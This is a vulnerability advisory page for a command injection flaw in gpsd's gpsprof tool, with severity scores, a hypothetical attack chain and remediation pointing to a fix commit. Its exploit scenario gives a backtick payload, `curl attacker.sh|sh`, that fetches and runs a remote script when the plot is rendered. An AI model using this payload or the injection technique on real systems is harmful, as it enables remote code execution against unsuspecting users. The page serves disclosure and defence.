Skip to main content

gpsd EUVDEUVD-2026-42622

| CVE-2026-58459 HIGH
OS Command Injection (CWE-78)
2026-07-09 VulnCheck GHSA-2hhc-4hqc-4mg8
8.4
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
8.4 HIGH
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
7.8 HIGH

Injected subtype data is processed locally and code runs only when the victim actively renders the plot (UI:R, AV:L); no auth needed (PR:N) and full code execution yields C/I/A:H.

3.1 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

1
Analysis Generated
Jul 09, 2026 - 17:05 vuln.today

DescriptionCVE.org

gpsd through release-3.27.5, fixed at commit 4c06658, contains a command injection vulnerability in gpsprof that allows attackers who control the GPS device subtype value to execute arbitrary shell commands by embedding backtick payloads in the gnuplot plot title without proper escaping. The subtype field sourced from a DEVICES JSON log entry or NMEA PGRMT sentence is written into a generated gnuplot program via a set title statement with only double-quote characters escaped, enabling arbitrary shell command execution as the user running gnuplot when the victim renders the generated plot through the gpsprof and gnuplot workflow.

AnalysisAI

Arbitrary shell command execution in gpsd's gpsprof profiling tool (through release-3.27.5) allows an attacker who controls a GPS device's subtype value to run commands as the user rendering the plot. The subtype string - taken from a DEVICES JSON log entry or an NMEA PGRMT sentence - is embedded into a generated gnuplot program's set title statement with only double quotes escaped, so backtick payloads execute when the victim renders the plot via the gpsprof/gnuplot workflow. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Spoof GPS device or craft log
Delivery
Inject backtick payload in subtype field
Exploit
Victim runs gpsprof to generate gnuplot program
Execution
Payload written into set title statement
Persist
Victim renders plot with gnuplot
Impact
Shell executes attacker commands as user

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to control the device 'subtype' value delivered through either a DEVICES JSON log entry or a Garmin NMEA PGRMT sentence, and to embed a backtick command-substitution payload in that field. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor CVSS 4.0 vector (AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H, base 8.4) captures the essential trade-off: high confidentiality/integrity/availability impact and no privileges required, but a LOCAL vector and mandatory active user interaction (the victim must run the gpsprof/gnuplot rendering workflow on attacker-influenced data). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker sets up a malicious or spoofed GPS device (or crafts a captured NMEA/DEVICES log) whose subtype field contains a backtick payload such as `curl attacker.sh|sh`. When a technician or developer profiles that device with gpsprof and renders the resulting gnuplot program, gnuplot performs command substitution on the title and runs the attacker's shell commands as the rendering user. …
Remediation Upstream fix available (PR/commit); released patched version not independently confirmed - update gpsd to a build that includes commit 4c06658e988f4ced1a7a574ce082a22ef625df56 (and companion commits 5581ba19 and 1a6bb7bc), applying the escaping fix for the gnuplot plot title. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify and inventory all systems running gpsd release-3.27.5 and earlier. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-42622 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy